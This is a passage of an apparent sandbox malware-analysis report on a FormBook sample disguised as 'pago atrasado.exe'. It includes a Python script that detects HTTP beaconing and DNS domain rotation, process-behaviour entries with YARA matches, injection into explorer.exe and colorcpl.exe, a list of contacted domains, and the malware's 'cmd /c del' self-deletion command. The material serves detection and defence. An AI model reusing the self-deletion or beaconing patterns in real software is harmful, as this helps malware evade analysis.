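     "www.example.com", "GET /index.html?lang=en HTTP/1.1", b""),
]

# Constructed from the DNS Queries / DNS Answers tables above: (timestamp, name, reply code).
# www.baybeg.com has no answer row in the report, so its reply code is left as None.
DNS_LOG = [
    ("2021-10-13 16:44:14.384647", "www.highvizpeople.com", "NOERROR"),
    ("2021-10-13 16:44:20.181121", "www.ttemola.com", "NXDOMAIN"),
    ("2021-10-13 16:44:25.232559", "www.oddanimalsink.com", "NOERROR"),
    ("2021-10-13 16:44:30.433674", "www.umgaleloacademy.com", "SERVFAIL"),
    ("2021-10-13 16:44:35.857576", "www.baybeg.com", None),
    ("2021-10-13 16:44:41.058072", "www.itskosi.com", "NOERROR"),
    ("2021-10-13 16:44:46.351602", "www.crisisinterventionadvocates.com", "NOERROR"),
    ("2021-10-13 16:44:51.682478", "www.ishhs.xyz", "NXDOMAIN"),
    ("2021-10-13 16:44:57.200576", "www.sfcn-dng.com", "NXDOMAIN"),
    ("2021-10-13 16:45:02.261355", "www.everythangbutwhite.com", "NOERROR"),
    ("2021-10-13 16:45:07.338278", "www.shopthatlookboutique.com", "NOERROR"),
    ("2021-10-13 16:45:12.463209", "www.christinegagnonjewellery.com", "NXDOMAIN"),
]


def parse_request(line):
    """Split 'GET /path?query HTTP/1.1' into (method, path, [(name, value), ...])."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qsl(parts.query, keep_blank_values=True)


def beacon_clusters(requests, min_hosts=3):
    """Group requests by method, path and parameter-name layout; report each layout
    sent to at least min_hosts distinct hosts, with its never-changing parameters,
    its non-browser senders and the number of all-NUL bodies."""
    groups = defaultdict(list)
    for _ts, proc, host, line, body in requests:
        method, path, params = parse_request(line)
        groups[(method, path, tuple(n for n, _ in params))].append((host, dict(params), proc, body))

    findings = []
    for (method, path, names), items in groups.items():
        hosts = {host for host, _, _, _ in items}
        if len(hosts) < min_hosts:
            continue
        constant = [n for n in names if len({p[n] for _, p, _, _ in items}) == 1]
        senders = {proc for _, _, proc, _ in items
                   if proc.rsplit("\\", 1)[-1].lower() not in BROWSERS}
        findings.append({
            "method": method, "path": path, "hosts": sorted(hosts),
            "constant_params": constant,
            "non_browser_processes": sorted(senders),
            "null_padded_bodies": sum(1 for _, _, _, b in items if b and set(b) == {0}),
        })
    return findings


def dns_rotation(log, min_names=5, max_jitter_s=1.5):
    """Summarise a run of lookups: distinct names, failed lookups, and whether the
    gap between consecutive queries is near-constant (a sleep-loop signature)."""
    times = [datetime.strptime(ts, TS_FMT) for ts, _, _ in log]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    names = {name for _, name, _ in log}
    failures = sum(1 for _, _, rcode in log if rcode in ("NXDOMAIN", "SERVFAIL"))
    regular = bool(gaps) and (max(gaps) - min(gaps)) <= max_jitter_s
    return {
        "distinct_names": len(names),
        "failed_lookups": failures,
        "median_gap_s": statistics.median(gaps) if gaps else None,
        "regular_interval": regular,
        "suspicious": len(names) >= min_names and failures > 0 and regular,
    }


if __name__ == "__main__":
    for finding in beacon_clusters(HTTP_REQUESTS):
        print("HTTP beacon layout:", finding)
    print("DNS pattern:", dns_rotation(DNS_LOG))
```

                                          Run it directly to print both summaries. The HTTP grouping deliberately ignores the varying z0 value and the Host name, so the rule keeps firing when the operator rotates domains, while the constructed browser request drops out because its layout is seen against a single host. In a real pipeline the same two functions would be fed from a proxy log and a resolver log, and the process field would come from an endpoint sensor that records which image opened the socket.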


                                          Code Manipulations

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                          Start time: 16:42:56
                                          Start date: 13/10/2021
                                          Path: C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit): true
                                          Commandline: 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase: 0x400000
                                          File size: 288183 bytes
                                          MD5 hash: F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: low

                                          General

                                          Start time: 16:42:58
                                          Start date: 13/10/2021
                                          Path: C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit): true
                                          Commandline: 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase: 0x400000
                                          File size: 288183 bytes
                                          MD5 hash: F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: low

                                          General

                                          Start time: 16:43:02
                                          Start date: 13/10/2021
                                          Path: C:\Windows\explorer.exe
                                          Wow64 process (32bit): false
                                          Commandline: C:\Windows\Explorer.EXE
                                          Imagebase: 0x7ff693d90000
                                          File size: 3933184 bytes
                                          MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation: high

                                          General

                                          Start time:16:43:34
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                          Imagebase:0xe0000
                                          File size:86528 bytes
                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis
